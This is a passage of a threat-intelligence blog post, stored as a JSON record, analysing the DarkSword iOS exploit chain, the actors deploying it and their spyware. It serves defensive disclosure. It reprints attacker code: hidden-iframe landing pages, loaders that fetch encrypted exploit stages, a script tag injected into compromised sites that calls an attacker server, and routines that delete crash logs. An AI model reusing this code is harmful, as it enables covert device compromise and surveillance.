{
	"id": "adefcfce-0050-436b-a69f-acb2bf9d3bcb",
	"created_at": "2026-04-06T00:16:47.384859Z",
	"updated_at": "2026-04-10T03:31:13.602438Z",
	"deleted_at": null,
	"sha1_hash": "62eabf70d765e7fc055409aa7008f48ee4ec3cfb",
	"title": "The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 521432,
	"plain_text": "The Proliferation of DarkSword: iOS Exploit Chain Adopted by\r\nMultiple Threat Actors\r\nBy Google Threat Intelligence Group\r\nPublished: 2026-03-18 · Archived: 2026-04-05 12:54:53 UTC\r\nIntroduction \r\nGoogle Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit\r\nchain to be called DarkSword. Since at least November 2025, GTIG has observed multiple commercial\r\nsurveillance vendors and suspected state-sponsored actors utilizing DarkSword in distinct campaigns. These threat\r\nactors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.\r\nDarkSword supports iOS versions 18.4 through 18.7 and utilizes six different vulnerabilities to deploy final-stage\r\npayloads. GTIG has identified three distinct malware families deployed following a successful DarkSword\r\ncompromise: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of this single exploit chain\r\nacross disparate threat actors mirrors the previously discovered Coruna iOS exploit kit. Notably, UNC6353, a\r\nsuspected Russian espionage group previously observed using Coruna, has recently incorporated DarkSword into\r\ntheir watering hole campaigns.\r\nIn this blog post, we examine the uses of DarkSword by these distinct threat actors, provide an analysis of their\r\nfinal-stage payloads, and describe the vulnerabilities leveraged by DarkSword. GTIG reported the vulnerabilities\r\nused in DarkSword to Apple in late 2025, and all vulnerabilities were patched with the release of iOS 26.3\r\n(although most were patched prior). We have added domains involved in DarkSword delivery to Safe Browsing,\r\nand strongly urge users to update their devices to the latest version of iOS. In instances where an update is not\r\npossible, it is recommended that Lockdown Mode be enabled for enhanced security.\r\nThis research is published in coordination with our industry partners at Lookout and iVerify.\r\nDiscovery Timeline\r\nGTIG has identified several different users of the DarkSword exploit chain dating back to November 2025. In\r\naddition to the case studies on DarkSword usage documented in this blog post, we assess it is likely that other\r\ncommercial surveillance vendors or threat actors may also be using DarkSword.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 1 of 23\n\nFigure 1: Timeline of DarkSword observations and vulnerability patches\r\nSaudi Arabian Users Targeted via Snapchat-Themed Website (UNC6748)\r\nIn early November 2025, GTIG identified the threat cluster UNC6748 leveraging a Snapchat-themed website,\r\nsnapshare[.]chat , to target Saudi Arabian users (Figure 2). The landing page on the website included JavaScript\r\ncode using a mix of obfuscation techniques, and created a new IFrame that pulled in another resource at\r\nframe.html (Figure 3). The landing page JavaScript also set a session storage key named uid , and checked if\r\nthat key was already set prior to creating the IFrame that fetches the next delivery stage. We assess this is to\r\nprevent re-infecting prior victims. In subsequent observations of UNC6748 throughout November 2025, we\r\nobserved them update the landing page to include anti-debugging and additional obfuscation to hinder analysis.\r\nWe also identified additional code added when the actor attempts to infect a user using Chrome, where the x-safari-https protocol handler is used to open the page in Safari (Figure 4). This suggests that UNC6748 didn't\r\nhave an exploit chain for Chrome at the time of this activity. During the infection process, the victim is redirected\r\nto a legitimate Snapchat website in an attempt to masquerade the activity.\r\nframe.html is a simple HTML file that dynamically injects a new script tag that loads in the main exploit\r\nloader, rce_loader.js (Figure 5). The loader performs some initialization used by subsequent stages, and\r\nfetches a remote code execution (RCE) exploit from the server using XMLHttpRequest (Figure 6).\r\nWe observed UNC6748 activity multiple times throughout November 2025, where both major and minor updates\r\nwere made to their infection process:\r\nThe first UNC6748 activity we observed only had support for one RCE exploit split across two files,\r\nrce_module.js and rce_worker_18.4.js (Figure 7). This exploit primarily leveraged CVE-2025-31277,\r\na memory corruption vulnerability in JavaScriptCore (the JavaScript engine used in WebKit and Apple\r\nSafari), and also CVE-2026-20700, a Pointer Authentication Codes (PAC) bypass in dyld .\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 2 of 23\n\nWe then identified activity several days later where another RCE exploit was added, rce_worker_18.6.js\r\n(Figure 8). This exploit used CVE-2025-43529, a different memory corruption vulnerability in\r\nJavaScriptCore, alongside the same CVE-2026-20700 exploit in the same file.\r\nThe loader was modified to also fetch a rce_module_18.6.js payload, which only defined a\r\nsimple function that was not observed in use elsewhere.\r\nHowever, the logic implemented for this did not correctly serve the iOS 18.4 exploit if the device\r\nversion wasn't 18.6, and did not account for the existence of iOS 18.7, even though it was released\r\ntwo months prior in September 2025. This suggests that this update may have been originally\r\nwritten months prior to UNC6748 acquiring and/or deploying it.\r\nLater in November 2025, we observed another module added, rce_worker_18.7.js (Figure 9). This was\r\nan updated version of rce_worker_18.6.js , but with offsets added to support iOS 18.7.\r\nThere was also a logic flaw in the loader in this case, as it loaded the exploit for iOS 18.7 regardless\r\nof the detected device version.\r\nIn our observations, UNC6748 used the same modules for sandbox escapes and privilege escalation, along with\r\nthe same final payload, GHOSTKNIFE.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 3 of 23\n\nFigure 2: snapshare[.]chat decoy page\r\nif (!sessionStorage.getItem(\"uid\") \u0026\u0026 isTouchScreen) {\r\n sessionStorage.setItem(\"uid\", '1');\r\n const frame = document.createElement(\"iframe\");\r\n frame.src = \"frame.html?\" + Math.random();\r\n frame.style.height = 0;\r\n frame.style.width = 0;\r\n frame.style.border = \"none\";\r\n document.body.appendChild(frame);\r\n} else {\r\n top.location.href = \"red\";\r\n}\r\nFigure 3: Landing page snippet that loads frame.html (UNC6748, November 2025)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 4 of 23\n\n\u003c!DOCTYPE html\u003e\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n \u003ctitle\u003e\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n \u003cscript type=\"text/javascript\"\u003edocument.write('\u003cscript defer=\\\"defer\\\" src=\\\"rce_loader.js\\\"\\\u003e\\\u003c\\/script\\\u003e');\u003c\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nFigure 4: frame.html contents (UNC6748, November 2025)\r\nif (typeof browser !== \"undefined\" || !isIphone()) {\r\n console.log(\"\");\r\n} else {\r\n location.href = \"x-safari-https://snapshare.chat/\u003credacted\u003e\";\r\n}\r\nFigure 5: Landing page code snippet showing x-safari-https use (UNC6748, November 2025)\r\nfunction getJS(fname,method = 'GET')\r\n{\r\n try\r\n {\r\n url = fname;\r\n print(`trying to fetch ${method} from: ${url}`);\r\n let xhr = new XMLHttpRequest();\r\n xhr.open(\"GET\", `${url}` , false);\r\n xhr.send(null);\r\n return xhr.responseText;\r\n }\r\n catch(e)\r\n {\r\n print(\"got error in getJS: \" + e);\r\n }\r\n}\r\nFigure 6: rce_loader.js snippet showing the logic for fetching additional stages (UNC6748, November 2025)\r\nlet workerCode = \"\";\r\nworkerCode = getJS(`rce_worker_18.4.js`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 5 of 23\n\nFigure 7: rce_loader.js snippet showing a single RCE exploit worker being loaded (UNC6748, November\r\n2025)\r\nlet workerCode = \"\";\r\nif(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')\r\n workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version\r\nelse\r\n workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 8: rce_loader.js snippet showing (attempted) support for different RCE exploit workers (UNC6748,\r\nNovember 2025)\r\nlet workerCode = \"\";\r\nif(ios_version == '18,7')\r\n workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version\r\nelse\r\n workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 9: rce_loader.js snippet with iOS 18.7 support added (UNC6748, November 2025)\r\nGHOSTKNIFE\r\nIn this activity, we observed UNC6748 deploy a backdoor GTIG tracks as GHOSTKNIFE. GHOSTKNIFE,\r\nwritten in JavaScript, has several modules for exfiltrating different types of data, including signed-in accounts,\r\nmessages, browser data, location history, and recordings. It also supports downloading files from the C2 server,\r\ntaking screenshots, and recording audio from the device's microphone. GHOSTKNIFE communicates with its C2\r\nserver using a custom binary protocol over HTTP, encrypted using a scheme based on ECDH and AES.\r\nGHOSTKNIFE can update its config with new parameters from its C2 server.\r\nGHOSTKNIFE writes files to disk during its execution under /tmp/\u003cuuid\u003e.\u003cnumbers\u003e , where uuid is a\r\nrandomly generated UUIDv4 value and numbers is a hard-coded sequence of several digits. Under that directory,\r\nit creates multiple subfolders including STORAGE , DATA , and TMP . As each module of GHOSTKNIFE executes,\r\nit writes its data to /tmp/\u003cuuid\u003e.\u003cnumbers\u003e/STORAGE/\u003cuuid2\u003e.\u003cid\u003e , where id is the numeric value of the\r\nmodule and uuid2 is a different randomly generated UUIDv4 value. Additionally, GHOSTKNIFE periodically\r\nerases crash logs from the device to cover its tracks in case of unexpected failures (Figure 10).\r\n cleanLogs(){\r\n let files = MyHelper.getContentsOfDir(\"/var/mobile/Library/Logs/CrashReporter/\");\r\n for(let file of files){//.ips // mediaplaybackd-\" panic-full-\r\n if(file.includes(\"mediaplaybackd\") || file.includes(\"SpringBoard\") || file.includes(\"com.apple.WebKit.\")\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 6 of 23\n\nMyHelper.deleteFileAtPath(file);\r\n }\r\n }\r\n }\r\nFigure 10: GHOSTKNIFE snippet responsible for deleting crash logs\r\nCampaigns Targeting Users in Turkey and Malaysia (PARS Defense)\r\nIn late November 2025, GTIG observed activity associated with the Turkish commercial surveillance vendor\r\nPARS Defense where DarkSword was used in Turkey, with support for iOS 18.4-18.7. Unlike the UNC6748\r\nactivity, this campaign was carried out with more attention to OPSEC, with obfuscation applied to the exploit\r\nloader and some of the exploit stages, and the use of ECDH and AES to encrypt exploits between the server and\r\nthe victim (Figure 11). Additionally, the obfuscated version of rce_loader.js used by PARS Defense fetched the\r\ncorrect RCE exploit depending on the detected iOS version (Figure 12).\r\nSubsequently, in January 2026, GTIG observed additional activity in Malaysia associated with a different PARS\r\nDefense customer. In this case, we were able to collect a different loader used in the activity, which contains\r\nadditional device fingerprinting logic, and also used the uid session storage check. This loader also uses the\r\ntop.location.href redirect for targets that do not pass all of the checks like UNC6748 did, but also sets\r\nwindow.location.href to the same URL (Figure 13).\r\nWhere available, GTIG identified a different final payload used in this activity, a backdoor we track as\r\nGHOSTSABER.\r\nfunction getJS(_0x12fba8) {\r\n const _0x35744f = generateKeyPair();\r\n const _0x4a6eb4 = exportPublicKeyAsPem(_0x35744f.publicKey);\r\n const _0x1bc168 = self.btoa(_0x4a6eb4);\r\n const _0x119092 = {\r\n 'a': _0x1bc168\r\n };\r\n _0x12fba8 = _0x12fba8.startsWith('/') ? _0x12fba8 : '/' + _0x12fba8;\r\n const _0x1fedd2 = new XMLHttpRequest();\r\n _0x1fedd2.open('POST', 'https://\u003credacted\u003e' + (_0x12fba8 + '?' + Date.now()), false);\r\n _0x1fedd2.setRequestHeader('Content-Type', 'application/json');\r\n _0x1fedd2.send(JSON.stringify(_0x119092));\r\n if (_0x1fedd2.status === 0xc8) {\r\n const _0x362968 = JSON.parse(_0x1fedd2.responseText);\r\n const _0x32efb2 = _0x362968.a;\r\n const _0x46ca4b = _0x362968.b;\r\n const _0xfae3b8 = b64toUint8Array(_0x32efb2);\r\n const _0x2f4536 = b64toUint8Array(_0x46ca4b);\r\n const _0xa36b4f = deriveAesKey(_0x35744f.privateKey, _0x2f4536);\r\n const _0x36e338 = decryptData(_0xfae3b8, _0xa36b4f);\r\n const _0x50186a = new TextDecoder().decode(_0x36e338);\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 7 of 23\n\nreturn _0x50186a;\r\n }\r\n return null;\r\n}\r\nFigure 11: Deobfuscated getJS() snippet from the DarkSword loader (PARS Defense, November 2025)\r\nlet workerCode = '';\r\nif (ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2' || ios_version == '18,7') {\r\n workerCode = getJS('6cde159c.js?' + Date.now());\r\n} else {\r\n workerCode = getJS('a9bc5c66.js?' + Date.now());\r\n}\r\nlet workerBlob = new Blob([workerCode], {\r\n 'type': 'text/javascript'\r\n});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 12: Deobfuscated snippet for loading the RCE workers (PARS Defense, November 2025)\r\nif (!sessionStorage.getItem('uid') \u0026\u0026 canUseApplePay() \u0026\u0026 \"standalone\" in navigator \u0026\u0026 (CSS.supports(\"backdrop-\r\n (() =\u003e {\r\n function _0x45e723(_0x52731a) {\r\n const _0x43f8d9 = generateKeyPair();\r\n const _0x427066 = exportPublicKeyAsPem(_0x43f8d9.publicKey);\r\n const _0x5cfee7 = self.btoa(_0x427066);\r\n const _0x96910f = {\r\n 'a': _0x5cfee7\r\n };\r\n _0x52731a = _0x52731a.startsWith('/') ? _0x52731a : '/' + _0x52731a;\r\n const _0x436cc4 = new XMLHttpRequest();\r\n _0x436cc4.open(\"POST\", 'https://\u003credacted\u003e' + (_0x52731a + '?' + Date.now()), false);\r\n _0x436cc4.setRequestHeader('Content-Type', \"application/json\");\r\n _0x436cc4.send(JSON.stringify(_0x96910f));\r\n if (_0x436cc4.status === 0xc8) {\r\n const _0x4a4193 = JSON.parse(_0x436cc4.responseText);\r\n const _0x362b30 = _0x4a4193.a;\r\n const _0x536004 = _0x4a4193.b;\r\n const _0x183b3f = b64toUint8Array(_0x362b30);\r\n const _0x46bbee = b64toUint8Array(_0x536004);\r\n const _0x43e600 = deriveAesKey(_0x43f8d9.privateKey, _0x46bbee);\r\n const _0x2e0735 = decryptData(_0x183b3f, _0x43e600);\r\n const _0x26a8b1 = new TextDecoder().decode(_0x2e0735);\r\n return _0x26a8b1;\r\n }\r\n return null;\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 8 of 23\n\n}\r\n let _0x100ce6 = _0x45e723('6297d177.html?' + Math.random());\r\n const _0x5f5a7d = document.createElement(\"iframe\");\r\n _0x5f5a7d.srcdoc = _0x100ce6;\r\n _0x5f5a7d.style.height = 0x0;\r\n _0x5f5a7d.style.width = 0x0;\r\n _0x5f5a7d.style.border = 'none';\r\n document.body.appendChild(_0x5f5a7d);\r\n })();\r\n} else {\r\n top.location.href = \"\u003clegit website\u003e\";\r\n window.location.href = '\u003clegit website\u003e';\r\n}\r\nFigure 13: Deobfuscated landing page snippet to fetch the DarkSword loader (PARS Defense, January 2026)\r\nGHOSTSABER\r\nGHOSTSABER is a JavaScript backdoor used by PARS Defense that communicates with its C2 server over\r\nHTTP(S). Its capabilities include device and account enumeration, file listing, data exfiltration, and the execution\r\nof arbitrary JavaScript code; a complete list of its supported commands is detailed in Table 1. Observed\r\nGHOSTSABER samples contain references to several commands that lack the necessary code to be executed,\r\nincluding some that purport to record audio from the device's microphone and send the device's current\r\ngeolocation to the C2 server. These commands use a function called send_command_to_upper_process , which\r\nwrites to a shared memory region that is otherwise unused in the implant. We suspect that a follow-on binary\r\nmodule may be downloaded from the C2 server to implement these commands at runtime.\r\nCommand Description\r\nChangeStatusCheckSleepInterval Changes the sleep duration between C2 check-ins\r\nSendDeviceInfo Uploads basic device information to the C2 server\r\nSendUserAccountsList Uploads a list of the signed-in accounts on the device to the C2 server\r\nSendAppList Uploads a list of the installed applications to the C2 server\r\nSendCurrentLocation Not directly implemented\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 9 of 23\n\nExecuteSqliteQuery\r\nExecutes an arbitrary SQL query against an arbitrary SQLite database\r\nand uploads the results to the C2 server\r\nUnwrapKey No-op\r\nSendScreenshot Not directly implemented\r\nSendWiFiInfo Not directly implemented\r\nSendThumbnails\r\nUploads thumbnails from iOS' Photos app within a specified time\r\nperiod to the C2 server\r\nSendApp\r\nUploads all of the files for a specified installed application to the C2\r\nserver\r\nRecordAudio Not directly implemented\r\nSendFiles Uploads a list of arbitrary files to the C2 server\r\nSendRegEx\r\nUploads a list of files with paths matching a specified regex pattern to\r\nthe C2 server\r\nSendFileList\r\nUploads a recursive list of files and metadata in a specified directory to\r\nthe C2 server\r\nEvalJs\r\nExecutes an arbitrary JavaScript blob and uploads the output to the C2\r\nserver\r\nTable 1: Commands supported by GHOSTSABER\r\nNew Ukrainian Watering Hole Activity From UNC6353\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 10 of 23\n\nGTIG observed the suspected Russian espionage actor UNC6353 leveraging DarkSword in a new watering hole\r\ncampaign targeting Ukrainian users. As mentioned in our recent blog post, we first began tracking UNC6353 in\r\nsummer 2025 as a threat cluster conducting watering hole attacks on Ukrainian websites to deliver Coruna. This\r\nnew activity, which has been active through March 2026 but dates back to at least December 2025, leverages the\r\nDarkSword exploit chain to deploy GHOSTBLADE. GTIG notified and collaborated with CERT-UA to mitigate\r\nthis activity.\r\nCompromised Ukrainian websites were updated to include a malicious script tag that fetched the first delivery\r\nstage from an UNC6353 server, static.cdncounter[.]net (Figure 14). This script (Figure 15) dynamically\r\ncreates a new IFrame and sets its source to a file called index.html on the same server (Figure 16). While\r\nindex.html bears some overlap with the landing page logic used by UNC6748 and PARS Defense, it sets the\r\nuid session storage key without checking the session's current state, and includes a Russian language comment\r\nthat translates to \"if uid is still needed, just install it.\"\r\nNotably, the observed UNC6353 use of DarkSword only supported iOS 18.4-18.6. While earlier DarkSword use\r\nattributed to UNC6748 and PARS Defense also supported iOS 18.7, we did not observe that from UNC6353,\r\ndespite their later operational timeline. However, the loader used in this version correctly loaded the RCE modules\r\ncorresponding to the running iOS version, which we didn't observe in UNC6748's use of DarkSword with only\r\niOS 18.4-18.6 support (Figure 17).\r\n\u003cscript async src=\"https://static.cdncounter.net/widgets.js?uhfiu27fajf2948fjfefaa42\"\u003e\u003c/script\u003e\r\nFigure 14: Malicious script tag used by UNC6353 (March 2026)\r\n(function () {\r\n const iframe = document.createElement(\"iframe\");\r\n iframe.src = \"https://static.cdncounter.net/assets/index.html\";\r\n iframe.style.width = \"1px\";\r\n iframe.style.height = \"1px\";\r\n iframe.style.border = \"0\";\r\n iframe.style.position = \"absolute\";\r\n iframe.style.left = \"-9999px\";\r\n iframe.style.opacity = \"0.01\";\r\n // важно для Safari\r\n iframe.setAttribute(\r\n \"sandbox\",\r\n \"allow-scripts allow-same-origin\"\r\n );\r\n document.body.appendChild(iframe);\r\n})();\r\nFigure 15: widgets.js (UNC6353, March 2026)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 11 of 23\n\n\u003c!DOCTYPE html\u003e\r\n\u003chtml lang=\"en\"\u003e\r\n\u003chead\u003e\r\n \u003cmeta charset=\"UTF-8\"\u003e\r\n \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\r\n \u003ctitle\u003eTest Page\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n \u003cscript\u003e\r\n // если uid всё ещё нужен — просто устанавливаем\r\n sessionStorage.setItem('uid', '1');\r\n const frame = document.createElement('iframe');\r\n frame.src = 'frame.html?' + Math.random();\r\n frame.style.width = '1px';\r\n frame.style.opacity = '0.01'\r\n frame.style.position = 'absolute';\r\n frame.style.left = '-9999px';\r\n frame.style.height = '1px';\r\n frame.style.border = 'none';\r\n document.body.appendChild(frame);\r\n \u003c/script\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nFigure 16: index.html (UNC6353, March 2026)\r\nlet workerCode = \"\";\r\nif(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')\r\n workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version\r\nelse\r\n workerCode = getJS(`rce_worker_18.4.js?${Date.now()}`); // local version\r\nlet workerBlob = new Blob([workerCode],{type:'text/javascript'});\r\nlet workerBlobUrl = URL.createObjectURL(workerBlob);\r\nFigure 17: rce_loader.js snippet for loading the RCE exploit workers (UNC6353, March 2026)\r\nGHOSTBLADE\r\nFollowing device infections from these watering holes, UNC6353 deployed a malware family GTIG tracks as\r\nGHOSTBLADE. GHOSTBLADE is a dataminer written in JavaScript that collects and exfiltrates a wide variety\r\nof data from a compromised device (Table 2). Data collected by GHOSTBLADE is exfiltrated to an attacker-controlled server over HTTP(S). Unlike GHOSTKNIFE and GHOSTSABER, GHOSTBLADE is less capable and\r\ndoes not support any additional modules or backdoor-like functionality; it also does not operate continuously.\r\nHowever, similar to GHOSTKNIFE, GHOSTBLADE also contains code to delete crash reports, but targets a\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 12 of 23\n\ndifferent directory where they may be stored (Figure 18). The GHOSTBLADE sample observed in this activity\r\nhad full debug logging present along with lots of comments in the code.\r\nNotably, the GHOSTBLADE sample analyzed by GTIG contains a comment and code block conditionally\r\nexecuting code on iOS versions greater than or equal to 18.4, which is the minimum supported version by\r\nDarkSword (Figure 19; note that ver is parsed from uname , which returns the XNU version). This suggests the\r\npayload also supports running on versions lower than 18.4, which isn't supported by DarkSword.\r\nCategory Collected Data\r\nCommunication and\r\nMessaging\r\niMessage database, Telegram data, WhatsApp data, mail indexes, call logs,\r\ncontacts interaction data, contacts\r\nIdentity and Access\r\nDevice/account identifiers, signed in accounts, device keychains, SIM card info,\r\ndevice profiles\r\nLocation and Mobility\r\nLocation history, saved/known WiFi networks and passwords, Find My iPhone\r\nsettings, location services settings\r\nPersonal Content and\r\nMedia\r\nPhotos metadata, hidden photos, screenshots, iCloud Drive files, Notes database,\r\nCalendar database\r\nFinancials and\r\nTransactions\r\nCryptocurrency wallet data\r\nUsage and Behavioral\r\nData\r\nSafari history/bookmarks/cookies, Health database, device personalization data\r\nSystem and Connectivity\r\nList of installed applications, Backup settings/info, cellular usage/data info, App\r\nStore preferences\r\nTable 2: Data collected by GHOSTBLADE\r\nstatic deleteCrashReports()\r\n{\r\nthis.getTokenForPath(\"/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/Diag\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 13 of 23\n\nlibs_JSUtils_FileUtils__WEBPACK_IMPORTED_MODULE_0__[\"default\"].deleteDir(\"/private/var/containers/Share\r\n}\r\nFigure 18: GHOSTBLADE code snippet used for deleting crash logs\r\n// If iOS \u003e= 18.4 we apply migbypass in order to bypass autobox restrictions\r\nif (ver.major == 24 \u0026\u0026 ver.minor \u003e= 4) {\r\nmutexPtr = BigInt(libs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__[\"default\"].callSymbol(\"malloc\", 0x100)\r\nlibs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__[\"default\"].callSymbol(\"pthread_mutex_init\", mutexPtr, nu\r\nmigFilterBypass = new MigFilterBypass(mutexPtr);\r\n}\r\nFigure 19: Code conditionally executed on iOS 18.4+ in GHOSTBLADE\r\nDarkSword Exploit Chain\r\nAs mentioned, DarkSword uses six different vulnerabilities to fully compromise a vulnerable iOS device and run a\r\nfinal payload with full kernel privileges (Table 3). Unlike Coruna, DarkSword only supports a limited set of iOS\r\nversions (18.4-18.7), and while the different exploit stages are technically sophisticated, the mechanisms used for\r\nloading the exploits were more basic and less robust than Coruna.\r\nAlso unlike Coruna, DarkSword uses pure JavaScript for all stages of the exploit chain and final payloads. While\r\nmore sophistication is required to bridge between JavaScript and the native APIs and IPC channels used in the\r\nexploit, its use eliminates the need to identify vulnerabilities for bypassing Page Protection Layer (PPL) or Secure\r\nPage Table Monitor (SPTM) exploit mitigations in iOS that prevent unsigned binary code from being executed.\r\nExploit Module CVE Description\r\nExploited as a\r\nZero-Day\r\nPatched in iOS\r\nVersion(s)\r\nrce_module.js\r\nCVE-2025-\r\n31277\r\nMemory corruption\r\nvulnerability in JavaScriptCore\r\nNo 18.6\r\nrce_worker_18.4.js\r\nCVE-2026-\r\n20700\r\nUser-mode Pointer\r\nAuthentication Code (PAC)\r\nbypass in dyld\r\nYes 26.3\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 14 of 23\n\nrce_worker_18.6.js\r\nrce_worker_18.7.js\r\nCVE-2025-\r\n43529\r\nMemory corruption\r\nvulnerability in JavaScriptCore\r\nYes 18.7.3, 26.2\r\nCVE-2026-\r\n20700\r\nUser-mode Pointer\r\nAuthentication Code (PAC)\r\nbypass in dyld\r\nYes 26.3\r\nsbox0_main_18.4.js\r\nsbx0_main.js\r\nCVE-2025-\r\n14174\r\nMemory corruption\r\nvulnerability in ANGLE\r\nYes 18.7.3, 26.2\r\nsbx1_main.js\r\nCVE-2025-\r\n43510\r\nMemory management\r\nvulnerability in the iOS kernel\r\nNo 18.7.2, 26.1\r\npe_main.js\r\nCVE-2025-\r\n43520\r\nMemory corruption\r\nvulnerability in the iOS kernel\r\nNo 18.7.2, 26.1\r\nTable 3: Exploits used in DarkSword\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 15 of 23\n\nFigure 20: DarkSword infection chain\r\nExploit Delivery\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 16 of 23\n\nThere are notable similarities and differences between the exploit delivery implementations used by UNC6748,\r\nPARS Defense, and UNC6353. We assess that each of the actors built their delivery mechanisms on a base set of\r\nlogic from the DarkSword developers, and made tweaks to fit their own needs. All three actors had some usage of\r\nthe uid session storage key, but not all in the same way:\r\nWe consistently saw UNC6748 landing pages both set the uid key, and check it before fetching the\r\nexploit loader.\r\nUNC6748 only set the top.location.href property to redirect users if they weren't to be infected.\r\nPARS Defense used the uid key in the same way in January 2026, but the initial activity we saw in\r\nNovember 2025 didn't include it.\r\nLike UNC6748, PARS Defense set top.location.href , but also set window.location.href to\r\nthe same value.\r\nUNC6353 set the uid key, but did not check it before fetching the exploit loader; a comment in the\r\nsource code suggests that they did not know if it was required by the subsequent stages.\r\nBased on the actors' differing usages, we assess that this session storage check logic, along with the subsequent\r\nlogic using frame.html to then fetch rce_loader.js as observed from UNC6748 and UNC6353, was\r\ndeveloped by the DarkSword exploit chain developers. We assess that the additional fingerprinting logic used by\r\nPARS Defense in January 2026 and the anti-debug logic used by UNC6748 in November 2025 were likely written\r\nby those users to better meet their operational requirements.\r\nLoader\r\nAll the activity we observed used effectively the same exploit loader, with some minor differences such as PARS\r\nDefense's addition of encryption. The loader manages Web Worker objects that are used by the two RCE exploits,\r\nalong with state transitions throughout the RCE exploit lifecycle. The loader fetches two files for the RCE stages,\r\nnamed variations of rce_module.js and rce_worker.js (e.g. rce_worker_18.4.js ). The iOS 18.4 exploit\r\nsplits the logic between the Web Worker script and the main module, which is eval 'd in the same context as the\r\nloader; the two different contexts communicate using postMessage as the RCE exploit progresses. The iOS\r\n18.6/18.7 RCE exploit, however, contains all of the exploit logic in the worker, and the corresponding\r\nrce_module.js file just has an unused placeholder function (Figure 21).\r\nThe inconsistencies surrounding the correctness of fetching the RCE stages by the loader module are intriguing.\r\nOne possibility is that the errors were manually corrected by UNC6353 and PARS Defense; alternatively, it is\r\npossible that UNC6748 received the exploit chain updates prior to the other users, and the DarkSword developers\r\nsubsequently fixed those bugs.\r\n// for displaying hex value\r\nfunction dummyy(x) {\r\n return '0x' + x.toString(16);\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 17 of 23\n\nFigure 21: rce_module_18.7.js contents (UNC6748, November 2025)\r\nRemote Code Execution Exploits\r\nGTIG observed two different JavaScriptCore (the JavaScript engine used in WebKit and Apple's Safari browser)\r\nvulnerabilities exploited for remote code execution by DarkSword. For devices running versions of iOS prior to\r\n18.6, DarkSword uses CVE-2025-31277, a JIT optimization/type confusion bug which was patched by Apple in\r\niOS 18.6. For devices running iOS 18.6-18.7, DarkSword uses CVE-2025-43529, a garbage collection bug in the\r\nData Flow Graph (DFG) JIT layer of JavaScriptCore which was patched by Apple in iOS 18.7.3 and 26.2 after it\r\nwas reported by GTIG. Both exploits develop their own fakeobj / addrof primitives, and then build arbitrary\r\nread/write primitives the same way on top of them.\r\nBoth vulnerabilities were directly chained with CVE-2026-20700, a bug in dyld used as a user-mode Pointer\r\nAuthentication Codes (PAC) bypass to execute arbitrary code, as required by the subsequent exploit stages. This\r\nvulnerability was patched by Apple in iOS 26.3 after being reported by GTIG.\r\nSandbox Escape Exploits\r\nSafari is designed to use multiple sandbox layers to isolate the different components of the browser where\r\nuntrusted user input may be handled. DarkSword uses two separate sandbox escape vulnerabilities, first by\r\npivoting out of the WebContent sandbox into the GPU process, and then by pivoting from the GPU process to\r\nmediaplaybackd . The same sandbox escape exploits were used regardless of which RCE exploit was needed.\r\nWebContent Sandbox Escape\r\nAs previously discussed by Project Zero and others, Safari's renderer process (known as WebContent) is 